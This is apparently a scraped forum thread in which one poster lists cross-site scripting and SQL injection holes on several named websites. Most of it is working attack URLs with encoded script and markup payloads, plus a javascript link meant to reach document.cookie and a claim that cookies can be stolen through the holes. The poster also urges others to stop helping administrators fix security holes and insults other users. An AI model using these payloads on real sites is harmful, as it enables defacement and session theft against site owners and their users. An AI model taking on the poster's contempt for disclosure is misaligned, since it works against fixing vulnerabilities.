source

http://themespot.info/?page=theme&themeid=%22%3E%3Cmarquee%3Elolz xssssss

http://www.themafiaman.com/tru/board.php?brd=recruit&tru=10 http://www.themafiaman.com/tru/pimp.php?tru=10 both xssable I can't finish cause some stupid fuck face disabled my account. Anyway this is the LAST time you will see me make a post on these forums. I do not believe you should help admins fix security holes anymore. Open-source/full disclosure is bad. I discourage everyone from doing it. Agentsteal I hope you read this... Don't waste your time with this helping people fix security anymore. It's a complete waste of time. lolz

first hole is in the register on step three if you put ">code as ur last name hit enter it runs. http://www.themafiaman.com/signup.php?step=4&email=%22%3E%3Cmarquee%3Elolz&referer= http://www.themafiaman.com/signup.php?step=%22%3E%3Cscript%3Ealert(1);%3C/script%3E&email=lolwtf@aol.com&referer= http://themafiaman.com/signup.php?step=3&refer=%22%3E%3Cmarquee%3Elolz http://themafiaman.com/tru/board.php?tru=10&action=post xss in message... and I can make it link to say <a href="javascript:alert(document.cookie)">CLICK HERE</a>

http://www.cutencuddly.org/letter/index.php?c=%22%3E%3Cbr%3E%3Cbr%3E%3Ch1%3ESource%20Is%201337%3C/h1%3E%3Cmarquee%3Efucked%3C/marquee%3E%3Ch1%3Eweak%20sekurite%20admin xss hole / sql hole

dear admin: your security is a joke. you're not even using sessions.

http://games4uonline.com/mymail/index.php?message=%3Cp%20align=center%3E%3Cfont%20face=Verdana%20size=2%20color=AF0001%3E%22%3E%3Cmarquee%3Eowndage%3C/font%3E%3C/p%3E

if you link to a site that does not exist it will give you fclose errors or something like that try to link to http://www.djaODJSKdjasKDjSKDADjASDK.com

I could not see the main page...

uhm hi i think i just pwnd ur site.. like on every page it says "expecting ending </marquee>" sorry about this roflmaolollercoptter

criminals on the internet are using complex encryption methods..

" I took the time to look at what you've posted here, and I can't say I'm impressed. Most of it is talking down on noobs, and most of it is not exactly friendly. Surely this is going to invoke another of your friendly responses, but go ahead, I expect no less. It's not like you have added ANYTHING of value to this forum. You're just another unfriendly blip on the radar. " I do not talk down to noobs. I hardly ever write anything besides posting exploits in the site itself. Surely if you did not want another one of my friendly responses you would not have posted, and attempted to troll me. Now if you say I've added nothing to this forum then you are a complete tard and made a false statement in your first line in saying that you read all of my posts. Now, stop trolling me.

"Nice comeback !! lol" If only I *cared* or *liked* any of you. Or respected any one on these forums, with the exception of one person.

"virtually un crackable despite users pword strength" If you want true security you should be salting and md5ing/sha1 the passwords multiple times. Salt should be different for each user.

"Take a couple of breaths before you freak out. If the OP does not care much about XSS (granted that he shouldn't post here and is wasting everybody's time), his loss. Although I must agree that inserting a marquee is only a tiny exploit. Try stealing a cookie using JavaScript or by loading an external entity (i.e. an image), then he has something to worry about." {snip} If you can use <marquee> you can steal cookies.

same old same old: http://obb.awardspace.com/index.php?page=viewforum&forum=%22%3E%3Cmarquee%3Elolz http://obb.awardspace.com/index.php?page=viewforum&forum=2&row=-1 http://obb.awardspace.com/index.php?page=newreply&forum=2&topic=%22%3E%3Cmarquee%3Elolz http://obb.awardspace.com/index.php?page=viewforum&forum=2&sort='